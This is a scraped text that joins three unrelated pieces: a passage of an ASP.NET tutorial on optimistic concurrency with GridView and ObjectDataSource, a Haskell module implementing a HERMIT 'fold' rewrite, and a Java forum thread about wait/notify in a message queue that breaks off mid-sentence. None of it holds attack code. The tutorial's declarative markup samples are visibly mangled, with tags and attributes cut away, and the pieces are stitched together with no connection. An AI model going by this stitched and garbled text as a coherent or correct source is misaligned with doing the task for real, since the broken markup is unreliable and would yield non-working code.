ProductsOptimisticConcurrencyRowinstance using the TableAdapter's
GetProductByProductID(productID)method
- Assign the original values to the
ProductsOptimisticConcurrencyRowinstance from Step 1
- Call the
ProductsOptimisticConcurrencyRowinstance's
AcceptChanges()method, which instructs the DataRow that its current values are the "original" ones
- Assign the new values to the
ProductsOptimisticConcurrencyRowinstance
- Call the TableAdapter's
Updatemethod, passing in the
ProductsOptimisticConcurrencyRowinstance
Step 1 reads in all of the current database values for the specified product record. This step is superfluous in the
UpdateProduct overload that updates all of the product columns (as these values are overwritten in Step 2), but is essential for those overloads where only a subset of the column values are passed in as input parameters. Once the original values have been assigned to the
ProductsOptimisticConcurrencyRow instance, the
AcceptChanges() method is called, which marks the current DataRow values as the original values to be used in the
@original_ColumnName parameters in the
UPDATE statement. Next, the new parameter values are assigned to the
ProductsOptimisticConcurrencyRow and, finally, the
Update method is invoked, passing in the DataRow.
The following code shows the
UpdateProduct overload that accepts all product data fields as input parameters. While not shown here, the
ProductsOptimisticConcurrencyBLL class included in the download for this tutorial also contains an
UpdateProduct overload that accepts just the product's name and price as input parameters.
protected void AssignAllProductValues (NorthwindOptimisticConcurrency.ProductsOptimisticConcurrencyRow product, string productName, int? supplierID, int? categoryID, string quantityPerUnit, decimal? unitPrice, short? unitsInStock, short? unitsOnOrder, short? reorderLevel, bool discontinued) {; } [System.ComponentModel.DataObjectMethodAttribute (System.ComponentModel.DataObjectMethodType.Update, true)] public bool UpdateProduct( // new parameter values string productName, int? supplierID, int? categoryID, string quantityPerUnit, decimal? unitPrice, short? unitsInStock, short? unitsOnOrder, short? reorderLevel, bool discontinued, int productID, // original parameter values string original_productName, int? original_supplierID, int? original_categoryID, string original_quantityPerUnit, decimal? original_unitPrice, short? original_unitsInStock, short? original_unitsOnOrder, short? original_reorderLevel, bool original_discontinued, int original_productID) { // STEP 1: Read in the current database product information NorthwindOptimisticConcurrency.ProductsOptimisticConcurrencyDataTable products = Adapter.GetProductByProductID(original_productID); if (products.Count == 0) // no matching record found, return false return false; NorthwindOptimisticConcurrency.ProductsOptimisticConcurrencyRow product = products[0]; // STEP 2: Assign the original values to the product instance AssignAllProductValues(product, original_productName, original_supplierID, original_categoryID, original_quantityPerUnit, original_unitPrice, original_unitsInStock, original_unitsOnOrder, original_reorderLevel, original_discontinued); // STEP 3: Accept the changes product.AcceptChanges(); // STEP 4: Assign the new values to the product instance AssignAllProductValues(product, productName, supplierID, categoryID, quantityPerUnit, unitPrice, unitsInStock, unitsOnOrder, reorderLevel, discontinued); // STEP 5: Update the product record int rowsAffected = Adapter.Update(product); // Return true if precisely one row was updated, otherwise false return rowsAffected == 1; }
Step 4: Passing the Original and New Values From the ASP.NET Page to the BLL Methods
With the DAL and BLL complete, all that remains is to create an ASP.NET page that can utilize the optimistic concurrency logic built in to the system. Specifically, the data Web control (the GridView, DetailsView, or FormView) must remember its original values and the ObjectDataSource must pass both sets of values to the Business Logic Layer. Furthermore, the ASP.NET page must be configured to gracefully handle concurrency violations.
Start by opening the
OptimisticConcurrency.aspx page in the
EditInsertDelete folder and adding a GridView to the Designer, setting its
ID property to
ProductsGrid. From the GridView's smart tag, opt to create a new ObjectDataSource named
ProductsOptimisticConcurrencyDataSource. Since we want this ObjectDataSource to use the DAL that supports optimistic concurrency, configure it to use the
ProductsOptimisticConcurrencyBLL object.
Figure 13: Have the ObjectDataSource Use the
ProductsOptimisticConcurrencyBLL Object (Click to view full-size image)
Choose the
GetProducts,
UpdateProduct, and
DeleteProduct methods from drop-down lists in the wizard. For the UpdateProduct method, use the overload that accepts all of the product's data fields.
Configuring the ObjectDataSource Control's Properties
After completing the wizard, the ObjectDataSource's declarative markup should look like the following:
<asp:ObjectDataSource <DeleteParameters> <asp:Parameter </DeleteParameters> <Update" /> <asp:Parameter </UpdateParameters> </asp:ObjectDataSource>
As you can see, the
DeleteParameters collection contains a
Parameter instance for each of the ten input parameters in the
ProductsOptimisticConcurrencyBLL class's
DeleteProduct method. Likewise, the
UpdateParameters collection contains a
Parameter instance for each of the input parameters in
UpdateProduct.
For those previous tutorials that involved data modification, we'd remove the ObjectDataSource's
OldValuesParameterFormatString property at this point, since this property indicates that the BLL method expects the old (or original) values to be passed in as well as the new values. Furthermore, this property value indicates the input parameter names for the original values. Since we are passing in the original values into the BLL, do not remove this property.
Note: The value of the
OldValuesParameterFormatString property must map to the input parameter names in the BLL that expect the original values. Since we named these parameters
original_productName,
original_supplierID, and so on, you can leave the
OldValuesParameterFormatString property value as
original_{0}. If, however, the BLL methods' input parameters had names like
old_productName,
old_supplierID, and so on, you'd need to update the
OldValuesParameterFormatString property to
old_{0}.
There's one final property setting that needs to be made in order for the ObjectDataSource to correctly pass the original values to the BLL methods. The ObjectDataSource has a ConflictDetection property that can be assigned to one of two values:
OverwriteChanges- the default value; does not send the original values to the BLL methods' original input parameters
CompareAllValues- does send the original values to the BLL methods; choose this option when using optimistic concurrency
Take a moment to set the
ConflictDetection property to
CompareAllValues.
Configuring the GridView's Properties and Fields
With the ObjectDataSource's properties properly configured, let's turn our attention to setting up the GridView. First, since we want the GridView to support editing and deleting, click the Enable Editing and Enable Deleting checkboxes from the GridView's smart tag. This will add a CommandField whose
ShowEditButton and
ShowDeleteButton are both set to
true.
When bound to the
ProductsOptimisticConcurrencyDataSource ObjectDataSource, the GridView contains a field for each of the product's data fields. While such a GridView can be edited, the user experience is anything but acceptable. The
CategoryID and
SupplierID BoundFields will render as TextBoxes, requiring the user to enter the appropriate category and supplier as ID numbers. There will be no formatting for the numeric fields and no validation controls to ensure that the product's name has been supplied and that the unit price, units in stock, units on order, and reorder level values are both proper numeric values and are greater than or equal to zero.
As we discussed in the Adding Validation Controls to the Editing and Inserting Interfaces and Customizing the Data Modification Interface tutorials, the user interface can be customized by replacing the BoundFields with TemplateFields. I've modified this GridView and its editing interface in the following ways:
- Removed the
ProductID,
SupplierName, and
CategoryNameBoundFields
- Converted the
ProductNameBoundField to a TemplateField and added a RequiredFieldValidation control.
- Converted the
CategoryIDand
SupplierIDBoundFields to TemplateFields, and adjusted the editing interface to use DropDownLists rather than TextBoxes. In these TemplateFields'
ItemTemplates, the
CategoryNameand
SupplierNamedata fields are displayed.
- Converted the
UnitPrice,
UnitsInStock,
UnitsOnOrder, and
ReorderLevelBoundFields to TemplateFields and added CompareValidator controls.
Since we've already examined how to accomplish these tasks in previous tutorials, I'll just list the final declarative syntax here and leave the implementation as practice.
<asp:GridView <Columns> :DropDownList <asp:ListItem</asp:Label> </ItemTemplate> </asp:TemplateField> <asp:TemplateField <EditItemTemplate> <asp:DropDownList <asp:ListItem </asp:ObjectDataSource> </EditItemTemplate> <ItemTemplate> <asp:Label</asp:Label> </ItemTemplate> </asp:TemplateField> <asp:BoundField <asp:TemplateField <EditItemTemplate> :CheckBoxField </Columns> </asp:GridView>
We're very close to having a fully-working example. However, there are a few subtleties that will creep up and cause us problems. Additionally, we still need some interface that alerts the user when a concurrency violation has occurred.
Note: In order for a data Web control to correctly pass the original values to the ObjectDataSource (which are then passed to the BLL), it's vital that the GridView's
EnableViewState property is set to
true (the default). If you disable view state, the original values are lost on postback.
Passing the Correct Original Values to the ObjectDataSource
There are a couple of problems with the way the GridView has been configured. If the ObjectDataSource's
ConflictDetection property is set to
CompareAllValues (as is ours), when the ObjectDataSource's
Update() or
Delete() methods are invoked by the GridView (or DetailsView or FormView), the ObjectDataSource attempts to copy the GridView's original values into its appropriate
Parameter instances. Refer back to Figure 2 for a graphical representation of this process.
Specifically, the GridView's original values are assigned the values in the two-way databinding statements each time the data is bound to the GridView. Therefore, it's essential that the required original values all are captured via two-way databinding and that they are provided in a convertible format.
To see why this is important, take a moment to visit our page in a browser. As expected, the GridView lists each product with an Edit and Delete button in the leftmost column.
Figure 14: The Products are Listed in a GridView (Click to view full-size image)
If you click the Delete button for any product, a
FormatException is thrown.
Figure 15: Attempting to Delete Any Product Results in a
FormatException (Click to view full-size image)
The
FormatException is raised when the ObjectDataSource attempts to read in the original
UnitPrice value. Since the
ItemTemplate has the
UnitPrice formatted as a currency (
<%# Bind("UnitPrice", "{0:C}") %>), it includes a currency symbol, like $19.95. The
FormatException occurs as the ObjectDataSource attempts to convert this string into a
decimal. To circumvent this problem, we have a number of options:
- Remove the currency formatting from the
ItemTemplate. That is, instead of using
<%# Bind("UnitPrice", "{0:C}") %>, simply use
<%# Bind("UnitPrice") %>. The downside of this is that the price is no longer formatted.
- Display the
UnitPriceformatted as a currency in the
ItemTemplate, but use the
Evalkeyword to accomplish this. Recall that
Evalperforms one-way databinding. We still need to provide the
UnitPricevalue for the original values, so we'll still need a two-way databinding statement in the
ItemTemplate, but this can be placed in a Label Web control whose
Visibleproperty is set to
false. We could use the following markup in the ItemTemplate:
<ItemTemplate> <asp:Label</asp:Label> <asp:Label</asp:Label> </ItemTemplate>
- Remove the currency formatting from the
ItemTemplate, using
<%# Bind("UnitPrice") %>. In the GridView's
RowDataBoundevent handler, programmatically access the Label Web control within which the
UnitPricevalue is displayed and set its
Textproperty to the formatted version.
- Leave the
UnitPriceformatted as a currency. In the GridView's
RowDeletingevent handler, replace the existing original
UnitPricevalue ($19.95) with an actual decimal value using
Decimal.Parse. We saw how to accomplish something similar in the
RowUpdatingevent handler in the Handling BLL- and DAL-Level Exceptions in an ASP.NET Page tutorial.
For my example I chose to go with the second approach, adding a hidden Label Web control whose
Text property is two-way data bound to the unformatted
UnitPrice value.
After solving this problem, try clicking the Delete button for any product again. This time you'll get an
InvalidOperationException when the ObjectDataSource attempts to invoke the BLL's
UpdateProduct method.
Figure 16: The ObjectDataSource Cannot Find a Method with the Input Parameters it Wants to Send (Click to view full-size image)
Looking at the exception's message, it's clear that the ObjectDataSource wants to invoke a BLL
DeleteProduct method that includes
original_CategoryName and
original_SupplierName input parameters. This is because the
ItemTemplates for the
CategoryID and
SupplierID TemplateFields currently contain two-way Bind statements with the
CategoryName and
SupplierName data fields. Instead, we need to include
Bind statements with the
CategoryID and
SupplierID data fields. To accomplish this, replace the existing Bind statements with
Eval statements, and then add hidden Label controls whose
Text properties are bound to the
CategoryID and
SupplierID data fields using two-way databinding, as shown below:
<asp:TemplateField <EditItemTemplate> ... </EditItemTemplate> <ItemTemplate> <asp:Label</asp:Label> <asp:Label</asp:Label> </ItemTemplate> </asp:TemplateField> <asp:TemplateField <EditItemTemplate> ... </EditItemTemplate> <ItemTemplate> <asp:Label</asp:Label> <asp:Label</asp:Label> </ItemTemplate> </asp:TemplateField>
With these changes, we are now able to successfully delete and edit product information! In Step 5 we'll look at how to verify that concurrency violations are being detected. But for now, take a few minutes to try updating and deleting a few records to ensure that updating and deleting for a single user works as expected.
Step 5: Testing the Optimistic Concurrency Support
In order to verify that concurrency violations are being detected (rather than resulting in data being blindly overwritten), we need to open two browser windows to this page. In both browser instances, click on the Edit button for Chai. Then, in just one of the browsers, change the name to "Chai Tea" and click Update. The update should succeed and return the GridView to its pre-editing state, with "Chai Tea" as the new product name.
In the other browser window instance, however, the product name TextBox still shows "Chai". In this second browser window, update the
UnitPrice to
25.00. Without optimistic concurrency support, clicking update in the second browser instance would change the product name back to "Chai", thereby overwriting the changes made by the first browser instance. With optimistic concurrency employed, however, clicking the Update button in the second browser instance results in a DBConcurrencyException.
Figure 17: When a Concurrency Violation is Detected, a
DBConcurrencyException is Thrown (Click to view full-size image)
The
DBConcurrencyException is only thrown when the DAL's batch update pattern is utilized. The DB direct pattern does not raise an exception, it merely indicates that no rows were affected. To illustrate this, return both browser instances' GridView to their pre-editing state. Next, in the first browser instance, click the Edit button and change the product name from "Chai Tea" back to "Chai" and click Update. In the second browser window, click the Delete button for Chai.
Upon clicking Delete, the page posts back, the GridView invokes the ObjectDataSource's
Delete() method, and the ObjectDataSource calls down into the
ProductsOptimisticConcurrencyBLL class's
DeleteProduct method, passing along the original values. The original
ProductName value for the second browser instance is "Chai Tea", which doesn't match up with the current
ProductName value in the database. Therefore the
DELETE statement issued to the database affects zero rows since there's no record in the database that the
WHERE clause satisfies. The
DeleteProduct method returns
false and the ObjectDataSource's data is rebound to the GridView.
From the end user's perspective, clicking on the Delete button for Chai Tea in the second browser window caused the screen to flash and, upon coming back, the product is still there, although now it's listed as "Chai" (the product name change made by the first browser instance). If the user clicks the Delete button again, the Delete will succeed, as the GridView's original
ProductName value ("Chai") now matches up with the value in the database.
In both of these cases, the user experience is far from ideal. We clearly don't want to show the user the nitty-gritty details of the
DBConcurrencyException exception when using the batch update pattern. And the behavior when using the DB direct pattern is somewhat confusing as the users command failed, but there was no precise indication of why.
To remedy these two issues, we can create Label Web controls on the page that provide an explanation to why an update or delete failed. For the batch update pattern, we can determine whether or not a
DBConcurrencyException exception occurred in the GridView's post-level event handler, displaying the warning label as needed. For the DB direct method, we can examine the return value of the BLL method (which is
true if one row was affected,
false otherwise) and display an informational message as needed.
Step 6: Adding Informational Messages and Displaying Them in the Face of a Concurrency Violation
When a concurrency violation occurs, the behavior exhibited depends on whether the DAL's batch update or DB direct pattern was used. Our tutorial uses both patterns, with the batch update pattern being used for updating and the DB direct pattern used for deleting. To get started, let's add two Label Web controls to our page that explain that a concurrency violation occurred when attempting to delete or update data. Set the Label control's
Visible and
EnableViewState properties to
false; this will cause them to be hidden on each page visit except for those particular page visits where their
Visible property is programmatically set to
true.
<asp:Label <asp:Label
In addition to setting their
Visible,
EnabledViewState, and
Text properties, I've also set the
CssClass property to
Warning, which causes the Label's to be displayed in a large, red, italic, bold font. This CSS
Warning class was defined and added to Styles.css back in the Examining the Events Associated with Inserting, Updating, and Deleting tutorial.
After adding these Labels, the Designer in Visual Studio should look similar to Figure 18.
Figure 18: Two Label Controls Have Been Added to the Page (Click to view full-size image)
With these Label Web controls in place, we're ready to examine how to determine when a concurrency violation has occurred, at which point the appropriate Label's
Visible property can be set to
true, displaying the informational message.
Handling Concurrency Violations When Updating
Let's first look at how to handle concurrency violations when using the batch update pattern. Since such violations with the batch update pattern cause a
DBConcurrencyException exception to be thrown, we need to add code to our ASP.NET page to determine whether a
DBConcurrencyException exception occurred during the update process. If so, we should display a message to the user explaining that their changes were not saved because another user had modified the same data between when they started editing the record and when they clicked the Update button.
As we saw in the Handling BLL- and DAL-Level Exceptions in an ASP.NET Page tutorial, such exceptions can be detected and suppressed in the data Web control's post-level event handlers. Therefore, we need to create an event handler for the GridView's
RowUpdated event that checks if a
DBConcurrencyException exception has been thrown. This event handler is passed a reference to any exception that was raised during the updating process, as shown in the event handler code below:
protected void ProductsGrid_RowUpdated(object sender, GridViewUpdatedEventArgs e) { if (e.Exception != null && e.Exception.InnerException != null) { if (e.Exception.InnerException is System.Data.DBConcurrencyException) { // Display the warning message and note that the // exception has been handled... UpdateConflictMessage.Visible = true; e.ExceptionHandled = true; } } }
In the face of a
DBConcurrencyException exception, this event handler displays the
UpdateConflictMessage Label control and indicates that the exception has been handled. With this code in place, when a concurrency violation occurs when updating a record, the user's changes are lost, since they would have overwritten another user's modifications at the same time. In particular, the GridView is returned to its pre-editing state and bound to the current database data. This will update the GridView row with the other user's changes, which were previously not visible. Additionally, the
UpdateConflictMessage Label control will explain to the user what just happened. This sequence of events is detailed in Figure 19.
Figure 19: A User s Updates are Lost in the Face of a Concurrency Violation (Click to view full-size image)
Note: Alternatively, rather than returning the GridView to the pre-editing state, we could leave the GridView in its editing state by setting the
KeepInEditMode property of the passed-in
GridViewUpdatedEventArgs object to true. If you take this approach, however, be certain to rebind the data to the GridView (by invoking its
DataBind() method) so that the other user's values are loaded into the editing interface. The code available for download with this tutorial has these two lines of code in the
RowUpdated event handler commented out; simply uncomment these lines of code to have the GridView remain in edit mode after a concurrency violation.
Responding to Concurrency Violations When Deleting
With the DB direct pattern, there is no exception raised in the face of a concurrency violation. Instead, the database statement simply affects no records, as the WHERE clause does not match with any record. All of the data modification methods created in the BLL have been designed such that they return a Boolean value indicating whether or not they affected precisely one record. Therefore, to determine if a concurrency violation occurred when deleting a record, we can examine the return value of the BLL's
DeleteProduct method.
The return value for a BLL method can be examined in the ObjectDataSource's post-level event handlers through the
ReturnValue property of the
ObjectDataSourceStatusEventArgs object passed into the event handler. Since we are interested in determining the return value from the
DeleteProduct method, we need to create an event handler for the ObjectDataSource's
Deleted event. The
ReturnValue property is of type
object and can be
null if an exception was raised and the method was interrupted before it could return a value. Therefore, we should first ensure that the
ReturnValue property is not
null and is a Boolean value. Assuming this check passes, we show the
DeleteConflictMessage Label control if the
ReturnValue is
false. This can be accomplished by using the following code:
protected void ProductsOptimisticConcurrencyDataSource_Deleted( object sender, ObjectDataSourceStatusEventArgs e) { if (e.ReturnValue != null && e.ReturnValue is bool) { bool deleteReturnValue = (bool)e.ReturnValue; if (deleteReturnValue == false) { // No row was deleted, display the warning message DeleteConflictMessage.Visible = true; } } }
In the face of a concurrency violation, the user's delete request is canceled. The GridView is refreshed, showing the changes that occurred for that record between the time the user loaded the page and when he clicked the Delete button. When such a violation transpires, the
DeleteConflictMessage Label is shown, explaining what just happened (see Figure 20).
Figure 20: A User s Delete is Canceled in the Face of a Concurrency Violation (Click to view full-size image)
Summary
Opportunities for concurrency violations exist in every application that allows multiple, concurrent users to update or delete data. If such violations are not accounted for, when two users simultaneously update the same data whoever gets in the last write "wins," overwriting the other user's changes changes. Alternatively, developers can implement either optimistic or pessimistic concurrency control. Optimistic concurrency control assumes that concurrency violations are infrequent and simply disallows an update or delete command that would constitute a concurrency violation. Pessimistic concurrency control assumes that concurrency violations are frequent and simply rejecting one user's update or delete command is not acceptable. With pessimistic concurrency control, updating a record involves locking it, thereby preventing any other users from modifying or deleting the record while it is locked.
The Typed DataSet in .NET provides functionality for supporting optimistic concurrency control. In particular, the
UPDATE and
DELETE statements issued to the database include all of the table's columns, thereby ensuring that the update or delete will only occur if the record's current data matches with the original data the user had when performing their update or delete. Once the DAL has been configured to support optimistic concurrency, the BLL methods need to be updated. Additionally, the ASP.NET page that calls down into the BLL must be configured such that the ObjectDataSource retrieves the original values from its data Web control and passes them down into the BLL.
As we saw in this tutorial, implementing optimistic concurrency control in an ASP.NET web application involves updating the DAL and BLL and adding support in the ASP.NET page. Whether or not this added work is a wise investment of your time and effort depends on your application. If you infrequently have concurrent users updating data, or the data they are updating is different from one another, then concurrency control is not a key issue. If, however, you routinely have multiple users on your site working with the same data, concurrency control can help prevent one user's updates or deletes from unwittingly overwriting another's.
|
http://www.asp.net/web-forms/overview/data-access/editing,-inserting,-and-deleting-data/implementing-optimistic-concurrency-cs
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
module Language.HERMIT.Primitive.Fold ( externals , foldR , stashFoldR ) where import GhcPlugins hiding (empty) import Control.Applicative import Control.Monad import Data.List (intercalate) import qualified Data.Map as Map import Language.HERMIT.Monad import Language.HERMIT.Context import Language.HERMIT.External import Language.HERMIT.Kure import Language.HERMIT.GHC import Language.HERMIT.Primitive.GHC hiding (externals) import Language.HERMIT.Primitive.Unfold hiding (externals) import qualified Language.Haskell.TH as TH import Prelude hiding (exp) ------------------------------------------------------------------------ externals :: [External] externals = [ external "fold" (promoteExprR . foldR) ["fold a definition" ,"" ,"double :: Int -> Int" ,"double x = x + x" ,"" ,"5 + 5 + 6" ,"any-bu (fold 'double)" ,"double 5 + 6" ,"" ,"Note: due to associativity, if you wanted to fold 5 + 6 + 6, " ,"you first need to apply an associativity rewrite." ] .+ Context .+ Deep , external "fold" (promoteExprR . stashFoldR) ["Fold a remembered definition."] .+ Context .+ Deep ] ------------------------------------------------------------------------ stashFoldR :: String -> RewriteH CoreExpr stashFoldR label = prefixFailMsg "Fold failed: " $ translate $ \ c e -> do Def i rhs <- lookupDef label guardMsg (inScope c i) $ var2String i ++ " is not in scope.\n(A common cause of this error is trying to fold a recursive call while being in the body of a non-recursive definition. This can be resolved by calling \"nonrec-to-rec\" on the non-recursive binding group.)" maybe (fail "no match.") return (fold i rhs e) foldR :: TH.Name -> RewriteH CoreExpr foldR nm = prefixFailMsg "Fold failed: " $ translate $ \ c e -> do i <- case filter (cmpTHName2Id nm) $ Map.keys (hermitBindings c) of [] -> fail "cannot find name." [i] -> return i is -> fail $ "multiple names match: " ++ intercalate ", " (map var2String is) either fail (\(rhs,_d) -> maybe (fail "no match.") return (fold i rhs e)) (getUnfolding False False i c) fold :: Id -> CoreExpr -> CoreExpr -> Maybe CoreExpr fold i lam exp = do let (vs,body) = foldArgs lam -- return Nothing if not equal, so sequence will fail below checkEqual :: Maybe CoreExpr -> Maybe CoreExpr -> Maybe CoreExpr checkEqual m1 m2 = ifM (exprEqual <$> m1 <*> m2) m1 Nothing al <- foldMatch vs [] body exp let m = Map.fromListWith checkEqual [(k,Just v) | (k,v) <- al ] es <- sequence [ join (Map.lookup v m) | v <- vs ] return $ mkCoreApps (Var i) es -- | Collect arguments to function we are folding, so we can unify with them. foldArgs :: CoreExpr -> ([Var], CoreExpr) foldArgs = go [] where go vs (Lam v e) = go (v:vs) e go vs e = (reverse vs, e) -- Note: Id in the concrete instance is first -- (not the Id found in the definition we are trying to fold). addAlpha :: Id -> Id -> [(Id,Id)] -> [(Id,Id)] addAlpha rId lId alphas | rId == lId = alphas | otherwise = (rId,lId) : alphas -- Note: return list can have duplicate keys, caller is responsible -- for checking that dupes refer to same expression foldMatch :: [Var] -- ^ vars that can unify with anything -> [(Id,Id)] -- ^ alpha equivalences, wherever there is binding -- note: we depend on behavior of lookup here, so new entries -- should always be added to the front of the list so -- we don't have to explicity remove them when shadowing occurs -> CoreExpr -- ^ pattern we are matching on -> CoreExpr -- ^ expression we are checking -> Maybe [(Var,CoreExpr)] -- ^ mapping of vars to expressions, or failure foldMatch vs as (Var i) e | i `elem` vs = return [(i,e)] | otherwise = case e of Var i' | maybe False (==i) (lookup i' as) -> return [(i,e)] | i == i' -> return [] _ -> Nothing foldMatch _ _ (Lit l) (Lit l') | l == l' = return [] foldMatch vs as (App e a) (App e' a') = do x <- foldMatch vs as e e' y <- foldMatch vs as a a' return (x ++ y) foldMatch vs as (Lam v e) (Lam v' e') = foldMatch (filter (==v) vs) (addAlpha v' v as) e e' foldMatch vs as (Let (NonRec v rhs) e) (Let (NonRec v' rhs') e') = do x <- foldMatch vs as rhs rhs' y <- foldMatch (filter (==v) vs) (addAlpha v' v as) e e' return (x ++ y) -- TODO: this depends on bindings being in the same order foldMatch vs as (Let (Rec bnds) e) (Let (Rec bnds') e') | length bnds == length bnds' = do let vs' = filter (`elem` map fst bnds) vs as' = [ (v',v) | ((v,_),(v',_)) <- zip bnds bnds' ] ++ as bmatch (_,rhs) (_,rhs') = foldMatch vs' as' rhs rhs' x <- zipWithM bmatch bnds bnds' y <- foldMatch vs' as' e e' return (concat x ++ y) foldMatch vs as (Tick t e) (Tick t' e') | t == t' = foldMatch vs as e e' foldMatch vs as (Case s b ty alts) (Case s' b' ty' alts') | (eqType ty ty') && (length alts == length alts') = do let as' = addAlpha b' b as x <- foldMatch vs as' s s' let vs' = filter (/=b) vs altMatch (ac, is, e) (ac', is', e') | ac == ac' = foldMatch (filter (`notElem` is) vs') (zip is' is ++ as') e e' altMatch _ _ = Nothing y <- zipWithM altMatch alts alts' return (x ++ concat y) foldMatch vs as (Cast e c) (Cast e' c') | coreEqCoercion c c' = foldMatch vs as e e' foldMatch _ _ (Type t) (Type t') | eqType t t' = return [] foldMatch _ _ (Coercion c) (Coercion c') | coreEqCoercion c c' = return [] foldMatch _ _ _ _ = Nothing
|
http://hackage.haskell.org/package/hermit-0.1.2.0/docs/src/Language-HERMIT-Primitive-Fold.html
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
/*
This file is part of [aconnect] library.
Author: Artem Kustikov (kustikoff[at]tut.by)
version: 0.1
This code is provided 'as-is', without any express or implied
warranty. In no event will the authors be held liable for any
damages arising from the use of this code.
Permission is granted to anyone to use this code for any
purpose, including commercial applications, and to alter it and
redistribute it freely, subject to the following restrictions:
1. The origin of this code must not be misrepresented; you must
not claim that you wrote the original code. If you use this
code in a product, an acknowledgment in the product documentation
would be appreciated but is not required.
2. Altered source versions must be plainly marked as such, and
must not be misrepresented as being the original code.
3. This notice may not be removed or altered from any source
distribution.
*/
#ifndef ACONNECT_DEFAULTS_H
#define ACONNECT_DEFAULTS_H
#include "network.hpp"
namespace aconnect
{
//),
reuseAddr (true),
enablePooling (true),
workersCount (500),
workerLifeTime (300),
socketReadTimeout (60),
socketWriteTimeout (60)
{ }
};
}
#endif // ACONNECT)
|
http://www.codeproject.com/script/Articles/ViewDownloads.aspx?aid=26556&zep=ahttplib%2Faconnect%2Fserver_settings.hpp&rzp=%2FKB%2Fcpp%2Fahttpserver%2F%2Fahttpserver_src.zip
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
Why notify/notifyAll() method doesnt invoke a waiting thread quickly?????
sajjad ahmad
Ranch Hand
Joined: Jan 23, 2003
Posts: 78
posted
Apr 22, 2007 10:03:00
0
I am currently working on a socket based IM server, I get messages from multiple clients simultaneously and put them into queues, for each queue in my server I have a separate listener running in a thread, as soon as a packet comes in the queue (from any client) it�s related thread is notified to get that packet from thread and process it.
Here I am using wait/notify blocking mechanism to control loop in my listener thread. My logic works like this
1)When Listener thread starts it calls the synchronized getNextPacket method on that queue if the queue has any packet (i.e. it�s length is greater then zero) then it will remove that packet from the underlying vector (NOTE: I am using Vector to contain packets) and return that packet to listener thread, else if queue doesn�t have any packet (i.e. its size is zero) then I will call wait() method which causes the listener thread to wait.
2)Now when any client adds some packet in that queue using synchronized addPacket( ) method I first add that packet in the underlying vector and then call notify()/notifyAll() to awake that listener thread, which again calls the getNextPacket() method and this cycle continuous like this.
So multiple threads (clients) are adding data in the queue using synchronized method, only one listener thread is getting data from that queue using a synchronized method again .
This approach works fine but sometimes I have noticed that the listener thread doesn�t resume just after notiy() / notifyAll() has been called , sometimes it resumes after a long time sometimes it even don�t resume (after waiting a long time I assumed this).
Solutions I tried
1)I did set the listener Thread�s priority to Maximum but facing same problem again.
For better understanding I am also sending you the code for my queue class and it�s listener thread.
CODE OF QUEUE CLASS
import java.util.Vector; import org.apache.log4j.Logger; import com.tcm.unicorn.server.UnicornCustomeObject; /** * @author sajjad.paracha * */ public class UIMPCommandsQueue { private static final Logger logger=Logger.getLogger(UIMPCommandsQueue.class); /** * Contains all the packets from clients */ private Vector <UnicornCustomeObject> unicornCustomeObjectQueue = new Vector<UnicornCustomeObject>(); private UIMPCommandsQueue(){ } private static UIMPCommandsQueue uIMPCommandsQueue = null; public static UIMPCommandsQueue getInstance(){ synchronized(UIMPCommandsQueue.class){ if(uIMPCommandsQueue!=null){ return uIMPCommandsQueue; }else return uIMPCommandsQueue = new UIMPCommandsQueue(); } } /** * Adds a new command * @param unicornCustomeObject */ public synchronized void addCommandPakcet(UnicornCustomeObject unicornCustomeObject){ logger.debug("[[[[[[[[[[[[[[[[[[[[[[[[[[ Going to add a packet in queue no "+unicornCustomeObject.getClientSession().getRequestQueueNo()); unicornCustomeObjectQueue.add(unicornCustomeObject); //** Notify the Listener (RequestProcessor) Thread that a new packet has been arrived in the queue //** So it now can again start it's processing notifyAll(); } /** * Removes an object from queue whose processing has been started or completed * @param unicornCustomeObject * @return */ private boolean removeCommandPacket(UnicornCustomeObject unicornCustomeObject){ return unicornCustomeObjectQueue.remove(unicornCustomeObject); } /** * <p> If no packet is available in queue it retuns null value * otherwise returns an object from that queue * <p> * @return unicornCustomeObject */ public synchronized UnicornCustomeObject getNextCommandPacket(){ if(unicornCustomeObjectQueue.size()>0){ UnicornCustomeObject unicornCustomeObject = unicornCustomeObjectQueue.get(0); logger.debug("[[[[[[[[[[[[[[[[[[[[[[[[[[ Got a packet from queue no "+unicornCustomeObject.getClientSession().getRequestQueueNo()); logger.debug("[[[[[[[[[[[[[[[[[[[[[[[[[[ Going to remove a packet from queue no "+unicornCustomeObject.getClientSession().getRequestQueueNo()); removeCommandPacket(unicornCustomeObject); return unicornCustomeObject; }else{ try { //** Force the Listener (RequestProcessor) Thread to wait for notification //** This Thread will be only notified if a new command packet has been arrived(added) in the //** Queue i.e in addCommandPacket Method wait(); } catch (InterruptedException e) { logger.error("",e); } return null; } } }
CODE OF LISTENER CLASS
import org.apache.log4j.Logger; import com.tcm.unicorn.server.UnicornCustomeObject; public class RequestProcessor implements Runnable { /** * will listen on Request queue for any new massages */ public void run() { //** get an instance of RequestQueue before the loop UIMPCommandsQueue requestQueue= UIMPCommandsQueue.getInstance(); while(true){ try{ //**call the blocking method getNextCommandPacket() UnicornCustomeObject unicornCustomeObject= requestQueue.getNextCommandPacket(); if(unicornCustomeObject!=null){ System.out.println("Got a pcket will process it now......."); } }catch(Exception exp){ exp.printStackTrace(); } } } }
Can anybody please tell me where I am doing something wrong and whats the best way to get rid of this situation .
Thanks in advance
[ April 22, 2007: Message edited by: sajjad ahmad ]
Jim Yingst
Wanderer
Sheriff
Joined: Jan 30, 2000
Posts: 18671
posted
Apr 22, 2007 19:37:00
0
Looking at your code, I don't see a cause for the behavior your describe. However the getNextCommandPacket() does seem rather strange. It looks like any time it can't find a command, it will wait,
and then return null
. It is
guaranteed
to return null after a wait. Why do that? Isn't the purpose of the wait to wait until you can return something besides null? I recommend you put a loop inside the getNextCommandPacket() method, so that the method rechecks if size() > 0 after each wait. Once you have size() > 0,
then
you can return. And then there's no need to check for null later.
Refactoring the code a bit may make the problem go away. If not, I would recommend adding more logging. In particular add log statements immediately before and after the wait() call, and before and after the notifyAll(). These log statements can also include the name of the thread doing the logging. In log4j you can get this wasily by including %t in the
PatternLayout
configuration. Or you can print it with Thread.currentThread().getName() if you need to. This will be useful to tell you which thread is doing what.
The objective here is to discover if the listener thread is really in the wait() method when notifyAll() is being sent, or if it's doing something else. If it's doing something else, then you can add more logging statements elsewhere in the program to discover just what he listener
is
